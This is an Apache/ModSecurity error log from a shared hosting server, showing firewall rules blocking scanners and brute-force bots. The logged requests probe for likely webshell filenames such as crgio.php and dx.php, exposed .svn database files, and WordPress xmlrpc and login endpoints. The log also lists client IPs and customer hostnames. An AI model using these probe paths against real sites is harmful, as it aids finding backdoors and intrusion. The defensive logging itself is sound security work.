[Tue May 26 16:36:45.880399 2026] [security2:error] [pid 808625:tid 808767] [client 4.204.220.190:43202] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/crgio.php"] [unique_id "ahV-xTEl_SBaWibfDmpqTQAAAAw"]
[Tue May 26 16:36:47.288933 2026] [security2:error] [pid 808625:tid 808870] [client 4.204.220.190:33825] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/geforce.php"] [unique_id "ahV-xzEl_SBaWibfDmpqbQAAAHM"]
[Tue May 26 16:36:47.289047 2026] [security2:error] [pid 808625:tid 808870] [client 4.204.220.190:33825] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/geforce.php"] [unique_id "ahV-xzEl_SBaWibfDmpqbQAAAHM"]
[Tue May 26 16:36:47.502294 2026] [security2:error] [pid 808625:tid 808793] [client 202.76.178.183:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-xzEl_SBaWibfDmpqXQAAACY"]
[Tue May 26 16:36:48.532028 2026] [security2:error] [pid 808625:tid 808846] [client 4.204.220.190:22998] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/pucci.php"] [unique_id "ahV-yDEl_SBaWibfDmpqgwAAAFs"]
[Tue May 26 16:36:48.532166 2026] [security2:error] [pid 808625:tid 808846] [client 4.204.220.190:22998] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/pucci.php"] [unique_id "ahV-yDEl_SBaWibfDmpqgwAAAFs"]
[Tue May 26 16:36:48.600598 2026] [security2:error] [pid 808625:tid 808872] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-xzEl_SBaWibfDmpqbAAAAHU"]
[Tue May 26 16:36:48.944575 2026] [security2:error] [pid 808625:tid 808713] [remote 46.101.75.237:58850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.75.101.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahV-yDEl_SBaWibfDmpqiQAATlc"]
[Tue May 26 16:36:49.032747 2026] [security2:error] [pid 808625:tid 808835] [client 117.198.37.168:61324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-yTEl_SBaWibfDmpqjQAAAFA"]
[Tue May 26 16:36:49.032902 2026] [security2:error] [pid 808625:tid 808835] [client 117.198.37.168:61324] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-yTEl_SBaWibfDmpqjQAAAFA"]
[Tue May 26 16:36:49.613712 2026] [security2:error] [pid 808625:tid 808827] [client 162.212.170.230:2088] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahV-yTEl_SBaWibfDmpqjgAAAEg"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 16:36:50.173881 2026] [security2:error] [pid 808625:tid 808760] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-yTEl_SBaWibfDmpqlAAAAAU"]
[Tue May 26 16:36:51.748343 2026] [security2:error] [pid 808625:tid 808833] [client 4.204.220.190:19338] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/wp-includes/blocks/details/"] [unique_id "ahV-yzEl_SBaWibfDmpqugAAAE4"]
[Tue May 26 16:36:51.794152 2026] [security2:error] [pid 808625:tid 808873] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-yzEl_SBaWibfDmpqsgAAAHY"]
[Tue May 26 16:36:53.232287 2026] [security2:error] [pid 808625:tid 808845] [client 114.119.150.166:45385] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/beta/index.php"] [unique_id "ahV-zTEl_SBaWibfDmpq0wAAAFo"], referer: http://glorodavionics.com/beta/index.php?route=information%2Fsitemap
[Tue May 26 16:36:53.745543 2026] [security2:error] [pid 808625:tid 808812] [client 4.204.220.190:45621] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahV-zTEl_SBaWibfDmpq5AAAADk"]
[Tue May 26 16:36:53.825301 2026] [security2:error] [pid 808625:tid 808868] [client 4.204.220.190:19338] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/wp-includes/blocks/audio/"] [unique_id "ahV-zTEl_SBaWibfDmpq5QAAAHE"]
[Tue May 26 16:36:53.898867 2026] [security2:error] [pid 808625:tid 808769] [client 4.204.220.190:45621] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahV-zTEl_SBaWibfDmpq5gAAAA4"]
[Tue May 26 16:36:54.251083 2026] [security2:error] [pid 808625:tid 808875] [client 4.204.220.190:19338] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/one.php"] [unique_id "ahV-zjEl_SBaWibfDmpq6gAAAHg"]
[Tue May 26 16:36:54.251243 2026] [security2:error] [pid 808625:tid 808875] [client 4.204.220.190:19338] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/one.php"] [unique_id "ahV-zjEl_SBaWibfDmpq6gAAAHg"]
[Tue May 26 16:36:54.736496 2026] [security2:error] [pid 808625:tid 808761] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-zTEl_SBaWibfDmpq3AAAAAY"]
[Tue May 26 16:36:55.512104 2026] [security2:error] [pid 808625:tid 808830] [client 4.204.220.190:34566] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/wp-temp.php"] [unique_id "ahV-zzEl_SBaWibfDmprAQAAAEs"]
[Tue May 26 16:36:55.512236 2026] [security2:error] [pid 808625:tid 808830] [client 4.204.220.190:34566] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/wp-temp.php"] [unique_id "ahV-zzEl_SBaWibfDmprAQAAAEs"]
[Tue May 26 16:36:55.564436 2026] [security2:error] [pid 808625:tid 808827] [client 74.7.241.131:35484] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "siliconelevators.in"] [uri "/cgi-sys/404.html"] [unique_id "ahV-zzEl_SBaWibfDmprAgAASAA"]
[Tue May 26 16:36:56.212634 2026] [security2:error] [pid 808625:tid 808876] [client 195.178.110.34:39476] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "cpanel.digentasmartsn.com"] [uri "/___proxy_subdomain_cpanel/.svn/wc.db"] [unique_id "ahV-0DEl_SBaWibfDmprEQAAAHk"]
[Tue May 26 16:36:56.244551 2026] [security2:error] [pid 808625:tid 808869] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-zzEl_SBaWibfDmpq_QAAAHI"]
[Tue May 26 16:36:56.413123 2026] [security2:error] [pid 808625:tid 808881] [client 195.178.110.34:39476] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "cpanel.digentasmartsn.com"] [uri "/___proxy_subdomain_cpanel/.svn/entries"] [unique_id "ahV-0DEl_SBaWibfDmprFQAAAH4"]
[Tue May 26 16:36:57.329411 2026] [core:error] [pid 808625:tid 808795] [client 195.178.110.34:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:36:57.329446 2026] [core:error] [pid 808625:tid 808795] [client 195.178.110.34:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:36:57.329586 2026] [security2:error] [pid 808625:tid 808795] [client 195.178.110.34:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cpanel.digentasmartsn.com"] [uri "/___proxy_subdomain_cpanel/index.php"] [unique_id "ahV-0TEl_SBaWibfDmprKAAAACg"]
[Tue May 26 16:36:57.336181 2026] [security2:error] [pid 808625:tid 808847] [client 195.178.110.34:40200] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cpanel.digentasmartsn.com"] [uri "/___proxy_subdomain_cpanel/"] [unique_id "ahV-0TEl_SBaWibfDmprJgAAAFw"]
[Tue May 26 16:36:57.571381 2026] [security2:error] [pid 808625:tid 808766] [client 4.204.220.190:51955] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/wp-includes/blocks/buttons/"] [unique_id "ahV-0TEl_SBaWibfDmprLQAAAAs"]
[Tue May 26 16:36:57.644182 2026] [security2:error] [pid 808625:tid 808756] [client 4.204.220.190:45621] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahV-0TEl_SBaWibfDmprLwAAAAE"]
[Tue May 26 16:36:57.822474 2026] [security2:error] [pid 808625:tid 808833] [client 4.204.220.190:51955] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/xmu.php"] [unique_id "ahV-0TEl_SBaWibfDmprOAAAAE4"]
[Tue May 26 16:36:57.822596 2026] [security2:error] [pid 808625:tid 808833] [client 4.204.220.190:51955] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/xmu.php"] [unique_id "ahV-0TEl_SBaWibfDmprOAAAAE4"]
[Tue May 26 16:36:58.254890 2026] [security2:error] [pid 808625:tid 808846] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-0TEl_SBaWibfDmprLAAAAFs"]
[Tue May 26 16:36:59.551219 2026] [security2:error] [pid 808625:tid 808779] [client 117.198.37.168:61637] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-0zEl_SBaWibfDmprVwAAABg"]
[Tue May 26 16:36:59.551340 2026] [security2:error] [pid 808625:tid 808779] [client 117.198.37.168:61637] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-0zEl_SBaWibfDmprVwAAABg"]
[Tue May 26 16:36:59.575944 2026] [core:error] [pid 808625:tid 808799] [client 195.178.110.34:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:36:59.575964 2026] [core:error] [pid 808625:tid 808799] [client 195.178.110.34:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:36:59.576071 2026] [security2:error] [pid 808625:tid 808799] [client 195.178.110.34:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cpanel.digentasmartsn.com"] [uri "/___proxy_subdomain_cpanel/index.php"] [unique_id "ahV-0zEl_SBaWibfDmprWgAAACw"]
[Tue May 26 16:36:59.576601 2026] [security2:error] [pid 808625:tid 808809] [client 195.178.110.34:40216] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cpanel.digentasmartsn.com"] [uri "/___proxy_subdomain_cpanel/"] [unique_id "ahV-0zEl_SBaWibfDmprWAAAADY"]
[Tue May 26 16:36:59.578332 2026] [security2:error] [pid 808625:tid 808828] [client 4.204.220.190:51960] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/mode.php"] [unique_id "ahV-0zEl_SBaWibfDmprWwAAAEk"]
[Tue May 26 16:36:59.578425 2026] [security2:error] [pid 808625:tid 808828] [client 4.204.220.190:51960] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/mode.php"] [unique_id "ahV-0zEl_SBaWibfDmprWwAAAEk"]
[Tue May 26 16:36:59.852075 2026] [security2:error] [pid 808625:tid 808823] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-0jEl_SBaWibfDmprSQAAAEQ"]
[Tue May 26 16:37:01.614813 2026] [security2:error] [pid 808625:tid 808783] [client 216.213.26.234:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-1TEl_SBaWibfDmpreAAAABw"], referer: https://www.anujtradingco.com/
[Tue May 26 16:37:02.401834 2026] [security2:error] [pid 808625:tid 808838] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-1TEl_SBaWibfDmprgQAAAFM"]
[Tue May 26 16:37:02.483790 2026] [core:error] [pid 808625:tid 808780] [client 195.178.110.34:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:37:02.483813 2026] [core:error] [pid 808625:tid 808780] [client 195.178.110.34:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:37:02.483915 2026] [security2:error] [pid 808625:tid 808780] [client 195.178.110.34:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cpanel.digentasmartsn.com"] [uri "/___proxy_subdomain_cpanel/index.php"] [unique_id "ahV-1jEl_SBaWibfDmprlAAAABk"]
[Tue May 26 16:37:02.484500 2026] [security2:error] [pid 808625:tid 808828] [client 195.178.110.34:40226] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cpanel.digentasmartsn.com"] [uri "/___proxy_subdomain_cpanel/"] [unique_id "ahV-1jEl_SBaWibfDmprkgAAAEk"]
[Tue May 26 16:37:02.845430 2026] [security2:error] [pid 808625:tid 808776] [client 216.213.26.234:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-1jEl_SBaWibfDmprmgAAABU"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1249610&moderation-hash=c47d059cfefba4a1f0afca58e3786cff
[Tue May 26 16:37:02.954585 2026] [security2:error] [pid 808625:tid 808847] [client 4.204.220.190:7336] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/wp-admin/js/index.php"] [unique_id "ahV-1jEl_SBaWibfDmprmwAAAFw"]
[Tue May 26 16:37:02.954706 2026] [security2:error] [pid 808625:tid 808847] [client 4.204.220.190:7336] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/wp-admin/js/index.php"] [unique_id "ahV-1jEl_SBaWibfDmprmwAAAFw"]
[Tue May 26 16:37:04.201101 2026] [security2:error] [pid 808625:tid 808775] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-1zEl_SBaWibfDmprqwAAABQ"]
[Tue May 26 16:37:05.624283 2026] [security2:error] [pid 808625:tid 808845] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-2DEl_SBaWibfDmpr2QAAAFo"]
[Tue May 26 16:37:06.051022 2026] [security2:error] [pid 808625:tid 808831] [client 4.204.220.190:50034] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/dx.php"] [unique_id "ahV-2jEl_SBaWibfDmpr7QAAAEw"]
[Tue May 26 16:37:06.051125 2026] [security2:error] [pid 808625:tid 808831] [client 4.204.220.190:50034] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/dx.php"] [unique_id "ahV-2jEl_SBaWibfDmpr7QAAAEw"]
[Tue May 26 16:37:07.002026 2026] [security2:error] [pid 808625:tid 808871] [client 195.178.110.34:49584] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cpanel.digentasmartsn.com"] [uri "/___proxy_subdomain_cpanel/"] [unique_id "ahV-2jEl_SBaWibfDmpsBAAAAHQ"]
[Tue May 26 16:37:07.974180 2026] [security2:error] [pid 808625:tid 808756] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-2zEl_SBaWibfDmpsDQAAAAE"]
[Tue May 26 16:37:10.019262 2026] [security2:error] [pid 808625:tid 808844] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-3TEl_SBaWibfDmpsNwAAAFk"]
[Tue May 26 16:37:10.185173 2026] [security2:error] [pid 808625:tid 808847] [client 117.198.37.168:61983] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-3jEl_SBaWibfDmpsQQAAAFw"]
[Tue May 26 16:37:10.185407 2026] [security2:error] [pid 808625:tid 808847] [client 117.198.37.168:61983] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-3jEl_SBaWibfDmpsQQAAAFw"]
[Tue May 26 16:37:10.793666 2026] [security2:error] [pid 808625:tid 808632] [remote 74.7.241.15:45130] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 15.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lodgerajasabai212.svijaykumar.in"] [uri "/index.php"] [unique_id "ahV-3jEl_SBaWibfDmpsVAAAPQY"], referer: https://www.lodgerajasabai212.svijaykumar.in/
[Tue May 26 16:37:11.872470 2026] [security2:error] [pid 808625:tid 808882] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-3zEl_SBaWibfDmpsYgAAAH8"]
